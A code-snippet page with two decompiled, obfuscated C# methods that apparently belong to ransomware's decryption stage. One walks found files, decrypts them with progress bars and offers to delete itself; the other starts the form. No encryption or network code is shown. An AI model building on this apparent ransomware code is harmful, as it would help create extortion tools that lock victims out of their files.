示例#1
0
        public void method_2(string string_1)
        {
            Delegate104.smethod_0(5000);
            Mutex object_ = Delegate17.smethod_0();

            if (this.gclass0_0.method_13(string_1))
            {
                Delegate105.smethod_0(this.progressBar_0, ProgressBarStyle.Blocks);
                Delegate102.smethod_1(this.progressBar_0, 0);
                Delegate102.smethod_2(this.progressBar_0, this.gclass0_0.method_22());
                Delegate83.smethod_3(this.progressBar_1, false);
                string[] array = this.string_0;
                for (int i = 0; i < array.Length; i++)
                {
                    string string_2 = array[i];
                    Delegate106.smethod_0(object_);
                    if (!Delegate98.smethod_1(string_2, ""))
                    {
                        Delegate54.smethod_0(this.label_8, string_2);
                        Delegate102.smethod_3(this.progressBar_0, 1);
                        this.gclass0_0.method_21(string_2);
                        Delegate107.smethod_0(object_);
                    }
                }
                Delegate106.smethod_0(object_);
                DialogResult dialogResult = Delegate97.smethod_0("Search and decryption of the found files completed. \n\nMake sure that all important files have been decrypted! If part of the files had not been decrypted - move them to the desktop and click <<Retry>> button. \n\nOtherwise, press <<Cancel>> button - this will delete the software from this computer. Please restart your computer to completely destroy this software!", "Attention!", MessageBoxButtons.RetryCancel, MessageBoxIcon.Exclamation);
                if (dialogResult == DialogResult.Retry)
                {
                    this.gclass0_0.method_23();
                    this.gclass0_0.method_24();
                }
                else
                {
                    this.gclass0_0.method_24();
                }
                Delegate107.smethod_0(object_);
            }
            Delegate108.smethod_0();
        }
示例#2
0
 private static void Main()
 {
     Delegate108.smethod_1();
     Delegate189.smethod_1(false);
     Delegate199.smethod_0(new Form1());
 }